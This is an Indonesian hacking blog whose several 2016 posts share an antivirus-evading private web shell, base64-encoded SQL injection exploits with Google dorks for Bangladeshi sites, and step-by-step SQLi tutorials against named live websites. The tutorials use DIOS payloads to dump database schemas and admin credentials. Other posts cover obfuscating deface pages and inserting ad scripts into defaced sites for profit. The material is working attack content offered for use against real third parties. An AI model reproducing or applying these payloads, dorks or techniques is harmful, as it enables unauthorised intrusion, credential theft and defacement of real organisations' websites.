Friday, December 30, 2016

Shell Privat Tidak terdetksi virus

Kali ini saya ingin berbagi shell yang saya gunakan.
shel yang berawal dari  gALerZ xh33L b4cKdDoRz.
dan saya recode untuk shell privat.

kenapa saya tertarik shell ini ?  

  1. ukuranya sangat kecil
  2. Tidak terdektsi sebagai virus di antivirus mana pun
  3. shellnya saya jadikan shell privat.
untuk ukuran shell ini yaitu hanya  sebesar 4kb saja.
dan ini hasil dari Total virus yang telah saya scan :


Tampilan Saat memasukan password :
 
untuk tampilan shell :
 



Badi yang ingin mendownloadnya bisa klik d sini
untul password shell default adalah : orie404

Cara Encoding Script Deface.

Kalian pasti sudah punya script Deface pribadi kan ?
dan kalian pasti pernah mengalami orang yang tanpa izin maen copas script kita dan di ubah nama namanya tanpa mencantumkan nama anda d dalamnya.

Kali ini saya punya solusi untuk memberi sedikit perlindungan pada script kita hanya bermodal kan HackBarMOD saja. :D

Perhatikan langkah - langkah berikut dan simak dengan baik supaya mengerti :D

Yang pertama di lakukan adalah buka kode script kalian dari <html> sampai </html> dan blok semuanya dari sampai seperti ini :
 
Sesudah di blok anda tinggal  mencopasnya saja di HackBarMod sperti ini :
 
Jika sudah di taro di HackBar anda tinggal memblocknya lagi lalu klik URLENC.DEC -->  maka hasilnya akan sperti ini :
 



Setelah itu copas Script dan Ganti tulisan warna biru dengan script yang telah kalian Encoding tadi  :

<Script Language='Javascript'>
<!-- bems404.blogspot.co.id -->
<!--
document.write(unescape('Taro hasil Encoding Script kalian di sini '));
//-->
</Script>

Contohnya seperti gambar berikut :
 

Dan save scriptnya dengan Extensi : HTML .
Kemudaian upload Script kalian seperti biasa :D
CONTOH Scrtipt saya yang telah di Encoding :


Dan saat di view-Sourcenya :
 
Sekian tutorial Tentang Encoding Script deface. semoga bermanfaat :D

    Tuesday, December 27, 2016

    Exploit web Banglades ( BD )

    Kali ini saya ingin berbagi salah satu dork dan exploit untuk website banglades ( bd ).
    Mungkin kalo sudah baca artikel saya tentang SQLI Base64 mungkin tau cara kerja exploit yang saya buat ini.

    oke langsung saja ke intinya :

    Dork     :  inurl : facilities.php?id=MQ== site:bd ( Kembangkan Sendiri supaya dapet banyak perawan )

    Exploit   :
    1. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0IC0tIA==
    2. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExIC0tIA==
    3. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5IC0tIA== 
    Menu Login admin : /login_slide.php

    Oke di situ terdapat 3 exploit, terus bagaimana cara penggunaanya ?
    simak baik - baik ya langkah demi langkahnya supaya mengerti .

    Hasil dari dork inurl : facilities.php?id=MQ== site:bd
     

    Untuk dork bisa di kembangkan sendiri yah :D

    Jika sudah memasukan dorknya silakan pilih salah satu webnya.
    Di sini saya pilih web http://www.dhakacollege.edu.bd/facilities.php?id=MQ== Sebagai target dan Contohnya.
     


    Jika Sudah memilih webnya anda tinggal masukan exploitnya saja.

    Bagaimana cara masukan exploitnya ?
    yaitu anda tinggal mengganti tulisan
    MQ== dengan exploitnya. Misalnya anda menggunakan exploit nomer 1 gagal anda bisa menggunakan exploit nomer 2 atau 3. Perhatikan gambar berikut :




    Nah lihat hasilnya muncul lah user dan passwordnya, anda tinggal men - cracknya saja.
    Dan masuk kemenu adminya :D


    oke sekian exploit sederhana yang saya buat ini :D


    untuk yang ingin bertana - bertanya seputar artikel yang saya buat bisa chat saya langsung .



    Monday, December 19, 2016

    SQLi memanfaatkan Menu pencarian pada website

    Mungkin hampir semua para injektor sudah mengetahui menemukan injek point memanfaatkan menu pencarian pada suatu web.

    Bagi yang blom tau dan ingin belajar,  di sini saya akan memberikan sdikit tutorial SQLi memanfaatkan menu pencarian pada suatu web.

    Bahan paling utama adalah HackBarMod .

    Di sini saya akan memberikan live target targetnya yaitu :
    http://pbi.co.id/media.php?module=Product

     

    oke d sini saya memanfaatkan menu pencarian barang.
     

    Mari di bagian colum pencarian kita masukan injek point nya, yaitu tanda kutip ( ' ).
    seperti ini :
     
    Jika sudah memasukan injek point nya langsung klik Mulai Pencarian atau tekan enter saja.
    maka hasilnya seperti ini :

    kita bisa lihat menu detail barangnya menghilang saat kita memberikan injek point pada menu pencarian barang.
    Terus bagaimana kita untuk melanjutkan injek nya ?
    oke setelah memberikan injek point mari kita lihat HackBarMod. mari kita Load Url dan ceklis menu Post data seperti ini :


     

    Kita bisa melihat di bagian bawah muncul sebuah menu post data dan dalam menu post data terdapat injek point yang sudah berubah menjadi Hex Encoding yaitu %27.
    nah kita bisa melanjutkan peng injeksian di balakng injek point kita yaitu %27 dengan memberinya comments terlebih dahulu.
    mari kita coba memberi commentsnya  +--+- lalu Execute. maka hasilnya seperti ini.
     
    ternyata memberi comments +--+- tidak mengembalikan detail produk sperti semula. mari kita coba tanda plus ( + ) di ubah menjadi sepasi . maka hasilnya seperti ini :
     
    Kita lihat setlah kita mengubah tanda puls ( + ) menjadi sepasi ternyata work bisa di lihat menu detail produknya kembali seperti semula.
    Langkah selanjutnya kita tinggal melakukan order by di belakang injek point atau %27 .
    seperti ini :
     
    di web ini saya menumkan colum error pada angka 12 seperti ini :
     

    kita bisa lihat di saat kita melakukan order by pada column 12 table detail produk - nya menghilang kembali.
    jadi column yg tidak error ada 11 columns, mari kita melakukan union select sebanyak column yang tidak error yaitu sebanyak 11 columns .
    seperti ini :
     D1=Ukuran&T1=-%27 UNION ALL SELECT+1,2,3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

    jika berhasil angka togelnya akan muncul seperti ini :
     

    Angka togelnya yaitu : 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 .

    Nah di bagian Angka yang muncul itu anda bisa melakukan DIOS saya memilih di angka 2 .
    Di sini saya menggunakan DIOS : concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))
    maka jadinya seperti ini :
    D1=Ukuran&T1=-%27 UNION ALL SELECT 1,concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

     Jika melakukanya benar Kita bisa lihat hasilnya seperti ini :
     

    Oke gmna mudah bukan ?

    Salam hangat dari orie404 dan terima kasih sudah datang ke sini, jika ingin bertanya - tanya silakan chat saya saja.

    Sunday, December 18, 2016

    Dork dan tips Bypass Sqli Base64

    Seblomnya saya sudah membahas tentang bagaimana cara bypass sqli menggunakan Base64.
    Kali ini saya ingin berbagi sdikit tips dan trik bypass sqli menggunakan Base64 yang seblomnya blom di bahas.

    Untuk dork di google anda bisa menggunakan dork sqli biasa atau bisa juga anda menggunakan dork untuk carding. dengan catatat ubah angka menjadi Base64 dahulu.

    Dork yang saya gunakan : inurl:product.php?id=MQ==

     

    setelah saya melakukan dorking pada google langsung saja saya pilih paling atas web tersebut yaitu.
    http://www.chakshueng.com/product.php?id=MQ==
     
    websitu sudah terbuka tinggal cek vuln atau tidaknya.

    Lihat gambar yang sblom ada menghilang saat di kash injek point.
    Pasti ada pertanyaan bagaimana cara menemukan injek pointnya ?
    bagaimna cara bypass sqli nya?

    oke perhatikan gambar d bawah ini untuk menjelaskanya.

     

     


    Nah jika sudah tau cara menemukan injek point dan merubahnya menjadi Base64 kita lanjut ke tahap berikutnya.

    Selanjutnya kita beri Comments di blakang injek point nya.
    Comments bisa berupa, -- ,--+ , +--+ , %20 , %60 , ;, dll.
    Dan jangan lupa di Encode menjadi Base64 seblom di execute.



                                               Hasil Pemberian Comments +--+ dan telah di execute


    Ternyata Comments +--+ tidak mengembalikan gambar atau tulisan yang menghilang saat pemberian injek point.
    Sekrang kita mencoba memberi comments ; .



                                                             Hasil pemberian Comments ;


    Ternyata sama saja pemberian Comments ; tidak mengembalikanya seperti semula.

    Saya memberikan Comments +--+ tetapi saya ubah tanda + menjadi sepasi.

                           hasi pemebrian Comments +--+ yang tanda + telah di ubah menjadi  sepasi .

    Sepertinya work pengubahan tanda + menjadi sepasi, kita bisa melihat gambar dan tulisan yang berada di bawah banner kembali sperti semula.
    knapa saat tanda + di ubah menjadi sepasi bisa work ?
    kita bisa melihat perbedaan perubahan Base64 saat penggunan Comments yang masih +--+ dan mengganti tanda + menjadi sepasi .

    product.php?id=1'+--+ Encode Base64 ( product.php?id=MScrLS0r )
    product.php?id=1' --  Encode Base64 ( product.php?id=MScgLS0g )

    nah selanjutnya kita tinggal order by saja.
    di web ini saya menemukan column error pada angka 8 jadi jumlah columns yg tidak error ada 7.





    Sekrang kita pemberian union select sampai jumalh columns yg tidak error.

     

     Kita bisa melihat Muncul lah angka togelnya :D selanjutnya kita tinggal menggunakan DIOS saja.
    sehingga hasilnya seperti ini.

     

    DIOS seblom d ubah menjadi Base64 :
    "http://www.chakshueng.com/product.php?id=-1' UNION ALL SELECT 1,2,3,concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),5,6,7 -- " ( tanpa tada kutip )

    DIOS sesudah di ubah menjadi Base64 :
    http://www.chakshueng.com/product.php?id=LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsY29uY2F0KDB4Njk2ZTZhNjU2YjIwNjI3OTIwNmY3MjY5NjUzNDMwMzQsMHgzYzYyNzIzZSwweDc2NjU3MjczNjk2ZjZlLDB4M2EsdmVyc2lvbigpLDB4M2M2MjcyM2UsMHg3NTczNjU3MiwweDNhLHVzZXIoKSwweDNjNjI3MjNlLDB4NDQ2MTc0NjE2MjYxNzM2NSwweDNhLGRhdGFiYXNlKCksMHgzYzYyNzIzZSwweDNjNjI3MjNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1LDYsNyAtLSA=

    Kesimpulan : jadi dalam setiap pengubahan Base64 penggunaan tanda + dan sepasi itu berbeda. dalam dunia injektor itu tanda + sama saja dengan sepasi.

    NB : Seblom kita execute sebaiknya kita ubah dulu menjadi Base64.

    Semoga bermanfaat artikel yang saya tulis ini semoga bermanfaat.

    Saturday, December 17, 2016

    Cara mendapatkan uang dari Deface

    Kali ini saya ingin memberi sedikit tambahan ilmu untuk mencari receh dengan cara deface.
    alangkah baiknya kita seblom menebas suatu web kita menyisipkan script popcash atau popads untuk ngumpulin receh.

    Hal yang pertama anda harus mempunyai akun popcash atau popads untuk mengambil script iklan yang akan di pasang pada script kalian.

    Anda bisa mendaftar popads disini.
    Dan popcash disini
    Saya beri contoh untuk popcash.
    Setelah anda mendaftar akun maka tampilan awalnya seperti ini.

     

    Selanjutnya anda tinggal pilih menu Websites pada dasboard popcash anda.

     

    Setelah memilih menu websites lalu pilih add a new website.

     

    Lalu anda isi bagian Domain untuk web yang akan anda tebas nantinya, bagian Category pilih sesuai jenis web yang akan anda tebas nantinya, setlah udah lalu pilh add website.

    Setelah add website anda tinggal menunggu webnya di Approved.  kemungkinan untuk di Approved adalah dalam waktu 1 x 24 jam .
    Setelah website di Approved anda bisa mengambil code javascript nya di bagian Get code .
     
     

    Setelah mendapatkan code javascript nya anda bisa memasangkan code tersebut dalam script anda di atas </body> atau di bawah <body> . seperti ini :

     
    Nah setelah anda memasang code popads tinggal apload dah script anda pada website tujuanya.
    contoh : sperti ini hasil script yg sudah di pasang popcash nya : klik

    Ibarat kata ini itu sebari menyelam minum air :D

    Semoga bermanfaat artikel yang saya buat ini, untuk kritik dan saran silakan komen :D

    Thursday, December 15, 2016

    Bypass SQLi menggunakan Base64 dan Null Comments

    Yos Kali ini saya ingin berbagi pengalaman saya pas pada saat melakukan SQLi yg di bypass dengan Base64.

    Alat = Hack Bar Mod atau bisa download di sini

    Pada awalnya saya merasa kebingungan pada salah satu website di url dia memiliki id=MTc= knapa berbentuk seperti itu ? knapa tidak angka? setlah berfikir sejenak saya berfikir kalo itu seperti encode Base64 dan benar saja setlah saya encodinng id=MTc= menjadi id=17.

    Seblumnya saya ingin menjelaskan sedikit tentang apa itu Base64. Base64 adalah kode yang disusun oleh 64 karakter, dimana karakternya ( berdasarkan : RFC 1421 ) terdiri dari ( A-Z, a-z, 0-9, +, /)  atau “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/”. Tapi ada satu karater tambahan yaitu “=”, yang fungsinya untuk menggenapkan atau istilahnya sebagai pengisi pad.

    Oke langsung saja ke pokok permsalhan yang pernah saya hadapi.
    Di sini saya mempunyai sebuah target yaitu:
    http://www.kecbojongkabpekalongan.com/media.php?module=detail_kuliner&id=MTc=



    Di situ kita bisa lihat urlnya seperti yg tadi saya jelaskan di atas.
    Lalu bagaimana cara mengetahui kalo web tersebut vuln ?
    dan bagai mana cara meng - encodingnya hanya bermodal HackbarMod saja ?

    Di sini saya akan menjawabnya.

    Hal pertama yang saya lakukan yaitu meng - encode Base64 nya terdahulu sehingga menjadi seperti ini :

    Seblom di Encode


    Sesudah di Encode maka muncul lah nilai sebnarnya

    Selanjutnya saya memberi injek point kepada angka 17 tersebut dan begini hasilnya.

      Injek Point seblom di ubah menjadi Base64

      Injek point setelah di ubah menjadi Base64
    Dari situ kita bisa lihat perbedaanya dimna pada saat web yg stringya blom di ubah menjadi Base64 dan sesudah di ubah menjadi Base64.
    Pada saat blom di ubah menjadi Base64 web seketika gambar dan tulisanya menghilang begitu saja.
    Sedangkan sesudah di ubah menjadi Base64 web tersebut menampilkan pesan error yaitu :
    "Fatal error: Call to a member function fetch() on a non-object in /home/u835814083/public_html/modul/wisata_kuliner/wisata_konten.php on line 3".Dari situ kita bisa mengetahui bahawa web tersebut hanya menerima string yang sudah di Encrypt menjadi Base64 saja.

    Selanjutanya kita mencoba memberi byte +--+ , --+ , --, --+- , %20 , %60, ; dan lain - lain.
    kita lihat hasilnya :

    Hasil dari pemberian cooments --+
    Ketika saya memberi comments --+ , +--+ , --+- , %20 , %60 masih tetap menampilkan sebuah pesan error yang sama.

    Sekrang saya ingin mencoba membri Byte ;00 yg seblomnya sudah saya bahas, tentunya Byte yg sudah di Encrypt menjadi Base64.


    Kita bisa lihat webnya gambar dan tulisan beritanya kembali seperti semula.
    selanjutnya kita beri order by dan jangn lupa order by harus di ubah juga menjadi Base64 .

    id=17'order by 1; menjadi id=MTcnb3JkZXIgYnkgMTslMDA= ( Tidak muncul error )
    id=17'order by 2; menjadi id=MTcnb3JkZXIgYnkgMjslMDA= ( Tidak muncul error )
    dan seterusnya, di sini saya menemukan error di bagian column 8

    Jika sudah mengetahui Column yg error berada di nomer berapanya kita tinggal ke tahap selanjutnya yaitu pemberian union all select .
    id=-17' UNION ALL SELECT+1,2,3,4,5,6,7; menjadi LTE3JyBVTklPTiBBTEwgU0VMRUNUKzEsMiwzLDQsNSw2LDc7JTAw .
     
    Dan taadaaa Muncul Lah angka togelnya :D

    selanjutanya kita Tinggal melakukan DIOS saja
    di sini saya pilih angka 2 untuk di lakukan DIOS dan ini hasilnya



    Sekian tutorial dari saya tentang bagaimana Bypass SQLi menggunakan Base64 dan Null Comments
     
    Cool Blue Outer Glow Pointer